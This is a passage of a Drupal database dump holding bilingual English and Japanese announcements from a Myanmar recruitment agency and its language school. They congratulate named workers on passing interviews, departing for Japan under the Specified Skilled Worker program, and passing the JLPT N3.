('activities', 0, 170, 642, 'en', 0, '<p><strong>A Remarkable Achievement in the Caregiving Sector</strong></p><p>New Comet Trading Agency is pleased to announce that Ms. Aye Aye Myint has successfully passed the interview for a Specified Skilled Worker (Kaigo) position in Japan.</p><p>Her success reflects determination, hard work, and a strong commitment to pursuing a professional career in Japan\'s caregiving industry.</p><p>We extend our heartfelt congratulations on this achievement and wish her every success in the upcoming procedures and future employment in Japan.</p><p>May this accomplishment serve as a stepping stone toward a rewarding and meaningful career dedicated to supporting others through caregiving services.</p><p>Congratulations on this wonderful achievement.</p>', '', 'full_html'),
('activities', 0, 170, 642, 'ja', 0, '<p data-start=\"1106\" data-end=\"1124\"><strong data-start=\"1106\" data-end=\"1124\">介護分野 面接合格のお知らせ</strong></p><p data-start=\"1126\" data-end=\"1200\">ニューコメット・トレーディング・エージェンシーは、AYE AYE MYINT さんが特定技能（介護）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1202\" data-end=\"1259\">今回の合格は、ご本人の努力と熱心な準備の成果であり、日本の介護分野で働くという目標に向けた大きな前進となりました。</p><p data-start=\"1261\" data-end=\"1301\">心よりお祝い申し上げるとともに、今後の手続きと日本でのご活躍をお祈りいたします。</p><p data-start=\"1303\" data-end=\"1351\">この素晴らしい成果が、介護の専門人材としての充実したキャリアの第一歩となることを願っております。</p><p data-start=\"1353\" data-end=\"1364\">おめでとうございます。</p><p data-start=\"1353\" data-end=\"1364\">&nbsp;</p>', '', 'full_html'),
('activities', 0, 171, 644, 'en', 0, '<p><strong>Departure to Japan – 26 April 2026</strong></p><p>New Comet Trading Agency is pleased to announce that Ms. May Phyoe Thu successfully departed for Japan on 26 April 2026 under the Specified Skilled Worker (Kaigo) Program.</p><p>This marks an important milestone in her journey toward building a professional career in Japan\'s caregiving sector. Through dedication, preparation, and determination, she has taken a significant step toward achieving her career goals.</p><p>We extend our heartfelt congratulations and wish her success, happiness, and personal growth as she begins this new chapter in Japan.</p><p>May her experience be rewarding and inspiring, both professionally and personally.</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/Departure%20%2826-4-2026%29%20May%20Phyoe%20Thu%202.jpg\" data-entity-uuid=\"12a9066d-2d55-40e5-a136-db747358582b\" data-entity-type=\"file\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/Departure%20%2826-4-2026%29%20May%20Phyoe%20Thu%203.jpg\" data-entity-uuid=\"3316e771-e7d7-49bb-ad65-29995729ec49\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 171, 644, 'ja', 0, '<p data-start=\"1082\" data-end=\"1101\"><strong data-start=\"1082\" data-end=\"1101\">2026年4月26日 日本出発</strong></p><p data-start=\"1103\" data-end=\"1176\">ニューコメット・トレーディング・エージェンシーは、MAY PHYOE THU さんが特定技能（介護）として日本へ出発されたことをご報告いたします。</p><p data-start=\"1178\" data-end=\"1232\">日本の介護分野で新たなキャリアをスタートされることとなり、ご本人にとって大きな節目となる素晴らしい機会です。</p><p data-start=\"1234\" data-end=\"1283\">これまでの努力が実を結び、日本での新しい生活と仕事が充実したものとなることを心より願っております。</p><p data-start=\"1285\" data-end=\"1309\">今後のご活躍とさらなる成長をお祈り申し上げます。</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/Departure%20%2826-4-2026%29%20May%20Phyoe%20Thu%202.jpg\" data-entity-uuid=\"12a9066d-2d55-40e5-a136-db747358582b\" data-entity-type=\"file\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/Departure%20%2826-4-2026%29%20May%20Phyoe%20Thu%203.jpg\" data-entity-uuid=\"3316e771-e7d7-49bb-ad65-29995729ec49\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 173, 648, 'en', 0, '<p><strong>Departure to Japan – 22 April 2026</strong></p><p>New Comet Trading Agency is delighted to announce that the following candidates successfully departed for Japan on 22 April 2026 under the Specified Skilled Worker (Food Service) Program.</p><p>• Ei Ei Khet<br>• Toe Toe Hlaing<br>• Thri Shin Thant<br>• Hnin Wa Than<br>• Su Myat Thu<br>• Myat Phoo Thaw<br>• Myat Noe Khin<br>• Hsu Wyne Wyne Pyae<br>• Khit Yu Ya Soe</p><p>After completing their language studies, skills training, and interview preparations, these candidates have taken an important step toward building successful careers in Japan.</p><p>We wish them all the best as they begin this exciting journey and embrace new opportunities in Japan\'s food service industry. May their hard work and determination lead them to a bright and successful future.</p><p>New Comet Trading Agency is proud to support Myanmar workers in achieving their international career goals.</p><img data-entity-uuid=\"a9d567ab-8592-4871-bf00-8e175f7b3141\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Departure%20%2822-4-2026%29%209%20person%202.jpg\"><p>&nbsp;</p><img data-entity-uuid=\"c19f16b1-c33d-42a4-b025-ee14026fc86c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Departure%20%2822-4-2026%29%209%20person%203.jpg\"><img data-entity-uuid=\"6c25a8b3-deae-4404-9f2b-b9aabe78dbf7\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Departure%20%2822-4-2026%29%209%20person%204.jpg\"><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 173, 648, 'ja', 0, '<p data-start=\"1305\" data-end=\"1324\"><strong data-start=\"1305\" data-end=\"1324\">2026年4月22日 日本出発</strong></p><p data-start=\"1326\" data-end=\"1393\">ニューコメット・トレーディング・エージェンシーは、以下の9名の候補者が特定技能（外食業）として日本へ出発されたことをご報告いたします。</p><p data-start=\"1395\" data-end=\"1585\">• EI EI KHET さん<br>• TOE TOE HLAING さん<br>• THRI SHIN THANT さん<br>• HNIN WA THAN さん<br>• SU MYAT THU さん<br>• MYAT PHOO THAW さん<br>• MYAT NOE KHIN さん<br>• HSU WYNE WYNE PYAE さん<br>• KHIT YU YA SOE さん</p><p data-start=\"1587\" data-end=\"1629\">皆様は日本語学習や面接準備を経て、日本の外食業界で新たなキャリアをスタートされます。</p><p data-start=\"1631\" data-end=\"1674\">日本で多くの経験を積み、それぞれの目標に向かって成長されることを心より願っております。</p><p data-start=\"1676\" data-end=\"1729\">ニューコメット・トレーディング・エージェンシーは、これからもミャンマー人材の日本就職を支援してまいります。</p><img src=\"/sites/default/files/inline-images/Departure%20%2822-4-2026%29%209%20person%202.jpg\" data-entity-uuid=\"a9d567ab-8592-4871-bf00-8e175f7b3141\" data-entity-type=\"file\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/Departure%20%2822-4-2026%29%209%20person%203.jpg\" data-entity-uuid=\"c19f16b1-c33d-42a4-b025-ee14026fc86c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/Departure%20%2822-4-2026%29%209%20person%204.jpg\" data-entity-uuid=\"6c25a8b3-deae-4404-9f2b-b9aabe78dbf7\" data-entity-type=\"file\"><p>&nbsp;</p>', '', 'full_html');
INSERT INTO `node__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('activities', 0, 174, 650, 'en', 0, '<p data-start=\"267\" data-end=\"304\"><strong data-start=\"267\" data-end=\"304\">Departure to Japan – 1 April 2026</strong></p><p data-start=\"306\" data-end=\"483\">New Comet Trading Agency is pleased to announce that Ms. Shwe Zin Phyo successfully departed for Japan on 1 April 2026 under the Specified Skilled Worker (Food Service) Program.</p><p data-start=\"485\" data-end=\"628\">After dedicated preparation and training, she has taken an important step toward building a successful career in Japan\'s food service industry.</p><p data-start=\"630\" data-end=\"777\">This departure marks the beginning of a new chapter filled with opportunities for professional development, cultural exchange, and personal growth.</p><p data-start=\"779\" data-end=\"911\">We sincerely congratulate her on this achievement and wish her success and happiness as she starts her new life and career in Japan.</p><p data-start=\"913\" data-end=\"1054\">New Comet Trading Agency will continue supporting Myanmar workers in achieving their dreams of working abroad and building a brighter future.</p><img data-entity-uuid=\"46cf94f9-086b-44fc-ac26-fa924bd93acc\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Departure%20%281-4-2026%29%20Shwe%20Zin%20Phyo%202.jpg\"><p data-start=\"913\" data-end=\"1054\">&nbsp;</p><img data-entity-uuid=\"238fceba-cf2d-4b11-8af8-19685b9398e3\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Departure%20%281-4-2026%29%20Shwe%20Zin%20Phyo%203.jpg\"><p data-start=\"913\" data-end=\"1054\">&nbsp;</p>', '', 'full_html'),
('activities', 0, 174, 650, 'ja', 0, '<p data-start=\"1223\" data-end=\"1241\"><strong data-start=\"1223\" data-end=\"1241\">2026年4月1日 日本出発</strong></p><p data-start=\"1243\" data-end=\"1317\">ニューコメット・トレーディング・エージェンシーは、SHWE ZIN PHYO さんが特定技能（外食業）として日本へ出発されたことをご報告いたします。</p><p data-start=\"1319\" data-end=\"1358\">これまでの努力と準備を経て、日本の外食業界で新たなキャリアをスタートされます。</p><p data-start=\"1360\" data-end=\"1405\">今回の出発は、ご本人にとって大きな成長と挑戦の機会であり、新しい未来への第一歩となります。</p><p data-start=\"1407\" data-end=\"1459\">日本での生活と仕事が充実したものとなり、多くの成功と素晴らしい経験に恵まれることを心より願っております。</p><p data-start=\"1461\" data-end=\"1512\">ニューコメット・トレーディング・エージェンシーは、今後もミャンマー人材の日本就職を支援してまいります。</p><img src=\"/sites/default/files/inline-images/Departure%20%281-4-2026%29%20Shwe%20Zin%20Phyo%202.jpg\" data-entity-uuid=\"46cf94f9-086b-44fc-ac26-fa924bd93acc\" data-entity-type=\"file\"><p data-start=\"913\" data-end=\"1054\">&nbsp;</p><img src=\"/sites/default/files/inline-images/Departure%20%281-4-2026%29%20Shwe%20Zin%20Phyo%203.jpg\" data-entity-uuid=\"238fceba-cf2d-4b11-8af8-19685b9398e3\" data-entity-type=\"file\"><p data-start=\"913\" data-end=\"1054\">&nbsp;</p>', '', 'full_html'),
('activities', 0, 175, 652, 'en', 0, '<p><strong>Departure to Japan – 29 March 2026</strong></p><p>New Comet Trading Agency is delighted to announce that Ms. Win Win Thu successfully departed for Japan on 29 March 2026 under the Specified Skilled Worker (Food Service) Program.</p><p>Her departure represents the beginning of an exciting new chapter as she pursues career opportunities in Japan\'s food service industry.</p><p>Through hard work, determination, and careful preparation, she has taken an important step toward achieving her professional goals abroad.</p><p>We wish her continued success, happiness, and valuable experiences as she begins her new life and career in Japan.</p><p>New Comet Trading Agency remains committed to supporting Myanmar workers in building successful international careers.</p><img data-entity-uuid=\"c8acaa1f-88f4-442a-a773-27b09b321a1d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Departure%20%2829-3-2026%29%20Win%20Win%20Thu%202.jpg\"><p>&nbsp;</p><img data-entity-uuid=\"61e5b1a6-5ba5-40f5-8f6f-a35a02349ded\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Departure%20%2829-3-2026%29%20Win%20Win%20Thu%203.jpg\">', '', 'full_html'),
('activities', 0, 175, 652, 'ja', 0, '<p data-start=\"1161\" data-end=\"1180\"><strong data-start=\"1161\" data-end=\"1180\">2026年3月29日 日本出発</strong></p><p data-start=\"1182\" data-end=\"1254\">ニューコメット・トレーディング・エージェンシーは、WIN WIN THU さんが特定技能（外食業）として日本へ出発されたことをご報告いたします。</p><p data-start=\"1256\" data-end=\"1292\">日本の外食業界で新たなキャリアを築くため、大きな一歩を踏み出されました。</p><p data-start=\"1294\" data-end=\"1329\">これまでの努力と準備が実を結び、日本での新しい生活と仕事が始まります。</p><p data-start=\"1331\" data-end=\"1375\">今後、多くの経験を積みながら成長され、充実した毎日を送られることを心より願っております。</p><p data-start=\"1377\" data-end=\"1430\">ニューコメット・トレーディング・エージェンシーは、これからもミャンマー人材の日本就職を支援してまいります。</p><img src=\"/sites/default/files/inline-images/Departure%20%2829-3-2026%29%20Win%20Win%20Thu%202.jpg\" data-entity-uuid=\"c8acaa1f-88f4-442a-a773-27b09b321a1d\" data-entity-type=\"file\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/Departure%20%2829-3-2026%29%20Win%20Win%20Thu%203.jpg\" data-entity-uuid=\"61e5b1a6-5ba5-40f5-8f6f-a35a02349ded\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 176, 654, 'en', 0, '<p data-start=\"249\" data-end=\"286\"><strong data-start=\"249\" data-end=\"286\">Departure to Japan – 5 March 2026</strong></p><p data-start=\"288\" data-end=\"462\">New Comet Trading Agency is pleased to announce that two candidates successfully departed for Japan on 5 March 2026 under the Specified Skilled Worker (Food Service) Program.</p><p data-start=\"464\" data-end=\"483\">The candidates are:</p><p data-start=\"485\" data-end=\"517\">• Aye Pyae Pyae Lwin<br>• Sabi Oo</p><p data-start=\"519\" data-end=\"644\">Their departure marks the beginning of an exciting journey as they pursue new opportunities in Japan\'s food service industry.</p><p data-start=\"646\" data-end=\"899\">Through dedication, training, and preparation, they have achieved an important milestone toward their professional goals. We are confident that they will continue to grow, gain valuable experience, and contribute positively to their workplaces in Japan.</p><p data-start=\"901\" data-end=\"1014\">We wish both candidates success, happiness, and a rewarding future as they begin this new chapter of their lives.</p><img data-entity-uuid=\"cb1d5cdb-6521-4855-86ea-62b28044fb68\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Departure%20%285-3-2026%29%20Sabai%20OO%202.jpg\"><p data-start=\"901\" data-end=\"1014\">&nbsp;</p><img data-entity-uuid=\"ce4dc739-1531-43b5-9395-dbff9148d993\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Departure%20%285-3-2026%29%20Aye%20Pyae%20Pyae%20Lwin%203.jpg\"><p data-start=\"901\" data-end=\"1014\">&nbsp;</p>', '', 'full_html'),
('activities', 0, 176, 654, 'ja', 0, '<p data-start=\"1173\" data-end=\"1191\"><strong data-start=\"1173\" data-end=\"1191\">2026年3月5日 日本出発</strong></p><p data-start=\"1193\" data-end=\"1260\">ニューコメット・トレーディング・エージェンシーは、以下の2名の候補者が特定技能（外食業）として日本へ出発されたことをご報告いたします。</p><p data-start=\"1262\" data-end=\"1300\">• AYE PYAE PYAE LWIN さん<br>• SABAI OO さん</p><p data-start=\"1302\" data-end=\"1332\">お二人は、日本の外食業界で新たなキャリアをスタートされます。</p><p data-start=\"1334\" data-end=\"1385\">これまでの学習や準備の成果を活かし、日本で多くの経験を積みながら成長されることを心より願っております。</p><p data-start=\"1387\" data-end=\"1419\">お二人の今後のご活躍と充実した日本での生活をお祈り申し上げます。</p><p data-start=\"1421\" data-end=\"1474\">ニューコメット・トレーディング・エージェンシーは、これからもミャンマー人材の日本就職を支援してまいります。</p><img src=\"/sites/default/files/inline-images/Departure%20%285-3-2026%29%20Sabai%20OO%202.jpg\" data-entity-uuid=\"cb1d5cdb-6521-4855-86ea-62b28044fb68\" data-entity-type=\"file\"><p data-start=\"901\" data-end=\"1014\">&nbsp;</p><img src=\"/sites/default/files/inline-images/Departure%20%285-3-2026%29%20Aye%20Pyae%20Pyae%20Lwin%203.jpg\" data-entity-uuid=\"ce4dc739-1531-43b5-9395-dbff9148d993\" data-entity-type=\"file\"><p data-start=\"901\" data-end=\"1014\">&nbsp;</p>', '', 'full_html'),
('activities', 0, 177, 656, 'en', 0, '<p data-start=\"265\" data-end=\"306\"><strong data-start=\"265\" data-end=\"306\">Departure to Japan – 12 February 2026</strong></p><p data-start=\"308\" data-end=\"491\">New Comet Trading Agency is pleased to announce that Ms. Tun Eaindra Moe successfully departed for Japan on 12 February 2026 under the Specified Skilled Worker (Food Service) Program.</p><p data-start=\"493\" data-end=\"633\">This achievement marks the beginning of a new chapter in her professional journey as she starts her career in Japan\'s food service industry.</p><p data-start=\"635\" data-end=\"776\">Through determination, preparation, and hard work, she has taken an important step toward achieving her goals and building a brighter future.</p><p data-start=\"778\" data-end=\"888\">We extend our sincere congratulations and wish her success, happiness, and many valuable experiences in Japan.</p><p data-start=\"890\" data-end=\"975\">May her new journey be filled with growth, opportunities, and memorable achievements.</p><img data-entity-uuid=\"628dca1b-6798-4314-9473-97858d65845a\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Departure-TEM-2.jpg\"><p data-start=\"890\" data-end=\"975\">&nbsp;</p><img data-entity-uuid=\"987dbd4c-8aaa-4956-a18b-807e73155bc2\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Departure-TEM-3.jpg\">', '', 'full_html'),
('activities', 0, 177, 656, 'ja', 0, '<p data-start=\"1145\" data-end=\"1164\"><strong data-start=\"1145\" data-end=\"1164\">2026年2月12日 日本出発</strong></p><p data-start=\"1166\" data-end=\"1242\">ニューコメット・トレーディング・エージェンシーは、TUN EAINDRA MOE さんが特定技能（外食業）として日本へ出発されたことをご報告いたします。</p><p data-start=\"1244\" data-end=\"1298\">日本の外食業界で新たなキャリアをスタートされることとなり、ご本人にとって大きな節目となる素晴らしい機会です。</p><p data-start=\"1300\" data-end=\"1343\">これまでの努力と準備が実を結び、日本での新しい生活と仕事への第一歩を踏み出されました。</p><p data-start=\"1345\" data-end=\"1389\">今後、多くの経験を積みながら成長され、充実した毎日を送られることを心より願っております。</p><p data-start=\"1391\" data-end=\"1420\">お仕事と生活の両面でご活躍されることをお祈り申し上げます。</p><img src=\"/sites/default/files/inline-images/Departure-TEM-2.jpg\" data-entity-uuid=\"628dca1b-6798-4314-9473-97858d65845a\" data-entity-type=\"file\"><p data-start=\"890\" data-end=\"975\">&nbsp;</p><img src=\"/sites/default/files/inline-images/Departure-TEM-3.jpg\" data-entity-uuid=\"987dbd4c-8aaa-4956-a18b-807e73155bc2\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 178, 662, 'en', 0, '<p data-start=\"346\" data-end=\"380\"><strong data-start=\"346\" data-end=\"380\">Interview Success Announcement</strong></p><p data-start=\"382\" data-end=\"552\">New Comet Trading Agency is delighted to announce that Ms. Phyo Thiri Htet has successfully passed the interview for a Specified Skilled Worker (Kaigo) position in Japan.</p><p data-start=\"554\" data-end=\"767\">Passing the interview represents an important milestone in her journey toward a professional caregiving career in Japan. Her dedication, preparation, and determination have contributed greatly to this achievement.</p><p data-start=\"769\" data-end=\"904\">As she moves forward to the next stages of the employment process, we wish her continued success and confidence in achieving her goals.</p><p data-start=\"906\" data-end=\"1035\">We look forward to seeing her begin a meaningful career in Japan\'s caregiving sector and make a positive impact through her work.</p><p data-start=\"906\" data-end=\"1035\">&nbsp;</p>', '', 'full_html'),
('activities', 0, 178, 662, 'ja', 0, '<p data-start=\"1189\" data-end=\"1202\"><strong data-start=\"1189\" data-end=\"1202\">面接合格のお知らせ</strong></p><p data-start=\"1204\" data-end=\"1280\">ニューコメット・トレーディング・エージェンシーは、PHYO THIRI HTET さんが特定技能（介護）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1282\" data-end=\"1351\">今回の合格は、日本で介護分野のキャリアを築くための大切な一歩となりました。これまでの努力と準備が実を結び、素晴らしい成果につながりました。</p><p data-start=\"1353\" data-end=\"1399\">今後の手続きが順調に進み、日本での新たな挑戦が実り多いものとなることを心より願っております。</p><p data-start=\"1401\" data-end=\"1425\">介護分野でのさらなるご活躍をお祈り申し上げます。</p><p data-start=\"906\" data-end=\"1035\">&nbsp;</p>', '', 'full_html'),
('activities', 0, 179, 664, 'en', 0, '<p data-start=\"367\" data-end=\"401\"><strong data-start=\"367\" data-end=\"401\">Interview Success Announcement</strong></p><p data-start=\"403\" data-end=\"530\">New Comet Trading Agency is pleased to share another successful interview result from our Tokutei Ginou (Food Service) program.</p><p data-start=\"532\" data-end=\"656\">Ms. Myat Thandar Kyaw has successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p data-start=\"658\" data-end=\"813\">This achievement reflects not only her dedication and effort but also the importance of proper preparation and training throughout the recruitment process.</p><p data-start=\"815\" data-end=\"1007\">At New Comet Trading Agency, we remain committed to connecting qualified Myanmar candidates with reliable employment opportunities in Japan and supporting them throughout their career journey.</p><p data-start=\"1009\" data-end=\"1146\">We sincerely congratulate Ms. Myat Thandar Kyaw and wish her continued success in the upcoming procedures and future employment in Japan.</p><p data-start=\"1009\" data-end=\"1146\">&nbsp;</p>', '', 'full_html'),
('activities', 0, 179, 664, 'ja', 0, '<p data-start=\"1304\" data-end=\"1317\"><strong data-start=\"1304\" data-end=\"1317\">面接合格のお知らせ</strong></p><p data-start=\"1319\" data-end=\"1379\">ニューコメット・トレーディング・エージェンシーは、特定技能（外食業）プログラムにおける嬉しい合格結果をご報告いたします。</p><p data-start=\"1381\" data-end=\"1426\">MYAT THANDAR KYAW さんが、特定技能（外食業）の採用面接に合格されました。</p><p data-start=\"1428\" data-end=\"1479\">今回の合格は、ご本人の努力と熱意の成果であるとともに、面接に向けた準備と学習の積み重ねによるものです。</p><p data-start=\"1481\" data-end=\"1561\">ニューコメット・トレーディング・エージェンシーは、今後もミャンマー人材と日本企業を結びつける架け橋として、就職活動から渡日後まで継続的な支援を行ってまいります。</p><p data-start=\"1563\" data-end=\"1603\">心よりお祝い申し上げるとともに、今後の手続きと日本でのご活躍をお祈りいたします。</p><p data-start=\"1563\" data-end=\"1603\">&nbsp;</p><p data-start=\"1009\" data-end=\"1146\">&nbsp;</p>', '', 'full_html'),
('activities', 0, 180, 667, 'en', 0, '<p data-start=\"365\" data-end=\"410\"><strong data-start=\"365\" data-end=\"410\">Celebrating a Successful Interview Result</strong></p><p data-start=\"412\" data-end=\"592\">New Comet Trading Agency is delighted to announce that Ms. Hsu Wyne Wyne Pyae has successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p data-start=\"594\" data-end=\"715\">This accomplishment reflects her commitment, perseverance, and determination to pursue employment opportunities in Japan.</p><p data-start=\"717\" data-end=\"879\">Passing the interview is an important step toward building a professional career abroad and demonstrates her readiness for the challenges and opportunities ahead.</p><p data-start=\"881\" data-end=\"1038\">We sincerely congratulate Ms. Hsu Wyne Wyne Pyae on this achievement and wish her success throughout the remaining procedures and her future career in Japan.</p>', '', 'full_html'),
('activities', 0, 180, 667, 'ja', 0, '<p data-start=\"1197\" data-end=\"1210\"><strong data-start=\"1197\" data-end=\"1210\">面接合格のお知らせ</strong></p><p data-start=\"1212\" data-end=\"1292\">ニューコメット・トレーディング・エージェンシーは、HSU WYNE WYNE PYAE さんが特定技能（外食業）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1294\" data-end=\"1347\">今回の合格は、ご本人の努力と継続的な学習の成果であり、日本で働くという目標に向けた大きな前進となりました。</p><p data-start=\"1349\" data-end=\"1389\">面接合格は新たなキャリアへの重要な第一歩であり、今後の活躍が大いに期待されます。</p><p data-start=\"1391\" data-end=\"1431\">心よりお祝い申し上げるとともに、日本でのご活躍とさらなる成功をお祈りいたします。</p>', '', 'full_html'),
('activities', 0, 181, 669, 'en', 0, '<p data-start=\"374\" data-end=\"405\"><strong data-start=\"374\" data-end=\"405\">JLPT N3 Success Achievement</strong></p><p data-start=\"407\" data-end=\"558\">New Comet Language Center is proud to announce that Ms. Su Su San has successfully passed the Japanese Language Proficiency Test (JLPT) N3 Examination.</p><p data-start=\"560\" data-end=\"743\">Having completed her N5, N4, and N3 studies at New Comet Language Center, she demonstrated dedication, perseverance, and a strong commitment to improving her Japanese language skills.</p><p data-start=\"745\" data-end=\"928\">Passing the JLPT N3 examination is a significant achievement and an important milestone for those pursuing higher education, career development, and employment opportunities in Japan.</p><p data-start=\"930\" data-end=\"1071\">We sincerely congratulate Ms. Su Su San on her success and wish her continued progress in her Japanese language studies and future endeavors.</p>', '', 'full_html'),
('activities', 0, 181, 669, 'ja', 0, '<p data-start=\"1229\" data-end=\"1252\"><strong data-start=\"1229\" data-end=\"1252\">JLPT N3合格おめでとうございます</strong></p><p data-start=\"1254\" data-end=\"1315\">ニューコメット日本語学校は、SU SU SAN さんが日本語能力試験（JLPT）N3に合格されたことをお知らせいたします。</p><p data-start=\"1317\" data-end=\"1387\">SU SU SAN さんは、当校でN5・N4・N3の学習課程を修了し、日々の努力と継続的な学習を通じて今回の素晴らしい成果を達成されました。</p><p data-start=\"1389\" data-end=\"1445\">JLPT N3の合格は、日本語能力の向上を証明する重要な成果であり、日本での進学や就職への大きな一歩となります。</p><p data-start=\"1447\" data-end=\"1486\">心よりお祝い申し上げるとともに、今後のさらなる成長とご活躍をお祈りいたします。</p>', '', 'full_html'),
('activities', 0, 182, 671, 'en', 0, '<p data-start=\"355\" data-end=\"400\"><strong data-start=\"355\" data-end=\"400\">Celebrating Academic Progress and Success</strong></p><p data-start=\"402\" data-end=\"558\">New Comet Language Center is delighted to announce that Ms. Aye Thazin has successfully passed the Japanese Language Proficiency Test (JLPT) N3 Examination.</p><p data-start=\"560\" data-end=\"694\">Her achievement is the result of continuous learning and dedication throughout her studies from N5 to N3 at New Comet Language Center.</p><p data-start=\"696\" data-end=\"865\">The successful completion of the JLPT N3 level demonstrates not only improved language proficiency but also a strong commitment to personal and professional development.</p><p data-start=\"867\" data-end=\"1042\">We are proud of her accomplishment and look forward to seeing her continue to advance toward even greater goals in Japanese language education and future career opportunities.</p><p data-start=\"1044\" data-end=\"1092\">Congratulations on this outstanding achievement.</p>', '', 'full_html'),
('activities', 0, 182, 671, 'ja', 0, '<p data-start=\"1255\" data-end=\"1279\"><strong data-start=\"1255\" data-end=\"1279\">学習の成果とJLPT N3合格のお知らせ</strong></p><p data-start=\"1281\" data-end=\"1343\">ニューコメット日本語学校は、AYE THAZIN さんが日本語能力試験（JLPT）N3に合格されたことをお知らせいたします。</p><p data-start=\"1345\" data-end=\"1410\">AYE THAZIN さんは、当校でN5からN3まで継続して学習され、努力を積み重ねた結果、今回の素晴らしい成果を達成されました。</p><p data-start=\"1412\" data-end=\"1468\">JLPT N3合格は、日本語能力の向上を証明するだけでなく、将来の進学や就職に向けた大切なステップでもあります。</p><p data-start=\"1470\" data-end=\"1502\">今後もさらなる日本語能力の向上とご活躍を心より期待しております。</p><p data-start=\"1504\" data-end=\"1515\">おめでとうございます。</p>', '', 'full_html'),
('activities', 0, 183, 673, 'en', 0, '<p data-start=\"397\" data-end=\"446\"><strong data-start=\"397\" data-end=\"446\">A New Milestone in Japanese Language Learning</strong></p><p data-start=\"448\" data-end=\"606\">New Comet Language Center is pleased to announce that Ms. Aye Pwint Phyu has successfully passed the Japanese Language Proficiency Test (JLPT) N3 Examination.</p><p data-start=\"608\" data-end=\"782\">After completing her N5, N4, and N3 studies at New Comet Language Center, she achieved this important milestone through consistent effort and dedication to language learning.</p><p data-start=\"784\" data-end=\"932\">Obtaining JLPT N3 certification creates new opportunities for further education, professional development, and employment pathways related to Japan.</p><p data-start=\"934\" data-end=\"1076\">We are delighted to celebrate her success and encourage her to continue pursuing higher levels of Japanese language proficiency in the future.</p><p data-start=\"1078\" data-end=\"1183\">Congratulations on this wonderful achievement, and we wish her continued success in all future endeavors.</p>', '', 'full_html'),
('activities', 0, 183, 673, 'ja', 0, '<p data-start=\"1353\" data-end=\"1371\"><strong data-start=\"1353\" data-end=\"1371\">JLPT N3合格のお知らせ</strong></p><p data-start=\"1373\" data-end=\"1439\">ニューコメット日本語学校は、AYE PWINT PHYU さんが日本語能力試験（JLPT）N3に合格されたことをお知らせいたします。</p><p data-start=\"1441\" data-end=\"1491\">N5・N4・N3の学習課程を修了し、継続的な努力を重ねた結果、今回の素晴らしい成果を達成されました。</p><p data-start=\"1493\" data-end=\"1558\">JLPT N3の取得は、日本語能力の向上を証明するだけでなく、進学や就職など将来のさまざまな可能性を広げる重要な資格でもあります。</p><p data-start=\"1560\" data-end=\"1606\">今後もさらなる目標に向かって挑戦を続けられ、ますます活躍されることを心より期待しております。</p><p data-start=\"1608\" data-end=\"1619\">おめでとうございます。</p>', '', 'full_html'),
('activities', 0, 184, 675, 'en', 0, '<p data-start=\"394\" data-end=\"434\"><strong data-start=\"394\" data-end=\"434\">Departure to Japan – 26 January 2026</strong></p><p data-start=\"436\" data-end=\"615\">New Comet Trading Agency is pleased to announce that Ms. Ei Ei Phyoe and Ms. Moe Moe Zaw successfully departed for Japan under the Specified Skilled Worker (Food Service) Program.</p><p data-start=\"617\" data-end=\"785\">Before reaching this important stage, both candidates completed language learning, interview preparation, and employment procedures required for overseas work in Japan.</p><p data-start=\"787\" data-end=\"907\">Their departure reflects the effort, commitment, and determination they demonstrated throughout the preparation process.</p><p data-start=\"909\" data-end=\"1082\">As they begin their careers in Japan\'s food service industry, we wish them success, valuable professional experiences, and continued growth in their new working environment.</p>', '', 'full_html'),
('activities', 0, 184, 675, 'ja', 0, '<p data-start=\"1266\" data-end=\"1285\"><strong data-start=\"1266\" data-end=\"1285\">2026年1月26日 日本出発</strong></p><p data-start=\"1287\" data-end=\"1375\">ニューコメット・トレーディング・エージェンシーは、EI EI PHYOE さんと MOE MOE ZAW さんが特定技能（外食業）として日本へ出発されたことをご報告いたします。</p><p data-start=\"1377\" data-end=\"1423\">お二人は日本で働くために、日本語学習や面接対策、各種手続きを経て今回の出発を迎えられました。</p><p data-start=\"1425\" data-end=\"1468\">これまで積み重ねてきた努力と準備が実を結び、新たなキャリアへの第一歩を踏み出されます。</p><p data-start=\"1470\" data-end=\"1517\">日本で多くの経験を積みながら成長され、充実した仕事と生活を送られることを心より願っております。</p>', '', 'full_html'),
